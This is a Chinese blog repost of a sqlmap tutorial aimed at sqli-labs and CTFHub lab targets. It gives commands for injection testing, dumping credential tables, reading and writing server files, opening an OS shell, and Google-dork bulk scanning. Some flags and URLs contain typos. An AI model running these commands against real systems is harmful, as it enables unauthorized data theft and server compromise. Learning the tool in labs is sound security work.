首页 > 数据库 >sqlmap的使用方法(linux)

sqlmap的使用方法(linux)

时间:2022-10-22 13:33:38浏览次数:53  
标签:sqlmap -- labs sqli master linux 方法 id

原文来自:https://blog.csdn.net/weixin_52084568/article/details/123839776

sqlmap的使用方法(linux)

sqlmap --version
查看sqlmap版本

sqlmap -h

查看sqlmap帮助

 

 

 

sqlmap -hh
查看sqlmap高级帮助

 针对URL进行探测,使用-u或者-url参数

查看目标url连接数据库的banner信息

sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1 --banner

 

sqlmap读取文件内目标

Sqlmap支持从不同类型的文件中读取目标进行Sql注入探测
1、-l从Burpsuite proxy或WebScarab proxy中读取Http 请求日志文件
sqlmap -l test(bp导出文件)
2、-x 从sitemap.xml站点地图文件中读取目标探测。
3、-m从多行文本格式文件读取多个目标,对多个目标进行探测。
sqlmap -m test.txt(自写的url)
4、-r从文本文件中读取Http请求作为Sql注入探测的目标。
sqlmap -r test.txt(bp导出请求的数据文件)
5、-C从配置文件sqlmap.conf中读取目标探测。

sqlmap google批量扫描注入
利用google hack语法进行扫描
sqlmap -g "inurl:\.php?id=1\""

sqlmap设置http请求方法
强制指定
--method=get
设置post提交参数
sqlmap -u '192.168.137.129/sqli-labs/Less-11/index.php' --data="uname=admin&passwd=admin&submit=Submit" -f --banner --dbs --users -f --fingerprint

sqlmap设置参数分隔符
get ;
post &

sqlmap设置cookie头
--cookie
--cookie-del
--load-cookies
--drop-sel-cookie
用于Web应用程序具有基于cookie的验证过程

利用cookie注入的漏洞

1.GET参数注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1"

2.POST参数注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1" --data="id=1"

3.cookie注入 (level>=2时才会检测cookie)

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 2

4.user-agent注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 3

5.referer注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 3

6.host注入

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --level 5

获取数据库信息

1.查看数据库

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --dbs --batch

2.查看数据库里面的表

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --tables --batch

3.查看数据库表里面的列

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --T users --columns --batch

4.查看数据库列里面的具体的值

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --D security --T users -C password --dump --batch

 

暴力破解

使用条件:

1.MySQL数据库版本小于5.0,没有information——schema表。

2.Microssoft Access数据库。

3.当前用户没有权限读取系统中保存的数据。

*暴力破解中破解表名的文件位于common-tables.txt 中,同理破解列名的文件位于common-columns.txt 中

1.暴力破解表名

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" -D security --common-tables --batch

 

2.暴力破解列名

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" -D security -Tusers --common-columns --batch

 

读取文件/上传文件
1.读取文件

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --file-read "C:/post.txt"

 

2写入文件

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --file-write "/root/1.txt"

--file-dest "C:/phpstudy/PHPTutorial/www/1.txt"

获取shell

sqlmap -u "http:/192.168.3.2/sqli-labs-master/sqli-labs-master/Less-1/?id=1" --os-shell

标签:sqlmap,--,labs,sqli,master,linux,方法,id
From: https://www.cnblogs.com/manmanwei/p/16815779.html

相关文章

  • 设计模式之工厂方法模式
    简介在简单工厂模式中只提供一个工厂类,该工厂类处于对产品类进行实例化的中心位置,它需要知道每一个产品对象的创建细节,并决定何时实例化哪一个产品类。简单工厂模式最大的......
  • 检测异常值的4种方法和R语言时间序列分解异常检测
    全文链接:http://tecdat.cn/?p=3232 原文出处:拓端数据部落公众号检测异常值的4种方法和R语言时间序列分解异常检测什么是异常值?异常值是与其他观测值有显著差异的数......
  • grep命令提示"binary file matches **.log"解决方法
    在查询日志的时候发现提示了这个错grep"binaryfilematches**.log"greptestXXX.logBinaryfileapp.logmatches此时使用-a参数接口。grep-atestXXX.log-a......
  • [安乐椅#5] 一种用曲线系证定点的方法
    前置知识:二次曲线系考虑二次曲线\(Ax^2+Bxy+Cy^2+Dx+Ey+F=0\)只需要平面内5个点(任意3点不共线)即可唯一确定。所以如果用4个点进行限制,放开1个自由度,就能表示一......
  • 【视频】逆变换抽样将数据标准化和R语言结构化转换:BOX-COX、凸规则变换方法
    全文链接:http://tecdat.cn/?p=22251 原文出处:拓端数据部落公众号归一化数据是数据科学中的一项常见任务。有时它可以让我们加快梯度下降的速度或提高模型的准确性,在某......
  • linux 查看二进制文件 hexdump
    一、显示文件二进制 hexdumpxx.bin    二、显示文件ASCII文件hexdump-Cxx.bin  ......
  • linux中的双括号
    linux中各种括号的使用双小括号(())①整数扩展。这种扩展计算是整数型的计算,不支持浮点型。((exp))结构扩展并计算一个算术表达式的值,如果表达式的结果为0,那么返回的......
  • Linux进程(一)
    操作系统概念:操作系统是管理计算机硬件与软件资源的计算机程序,简称OS。为什么要有操作系统:1.给用户提供稳定、高效和安全的运行环境,为程序员提供各种基本功能(OS不信任任......
  • linux docker容器安装nacos
    1、添加nacos数据源createdatabasecloud_nacos;usecloud_nacos;/**Copyright1999-2018AlibabaGroupHoldingLtd.**LicensedundertheApacheLicense......
  • Linux下matalb2021a和2022a无法启动simulink的解决方案之一
    提示错误类似:bin/glnxa64/MATLABWindow:symbollookuperror:somelibrary:undefinedsymbol:FT_Get_Var_Blend_Coordinatesor:bin/glnxa64/MATLABWindow:symbollo......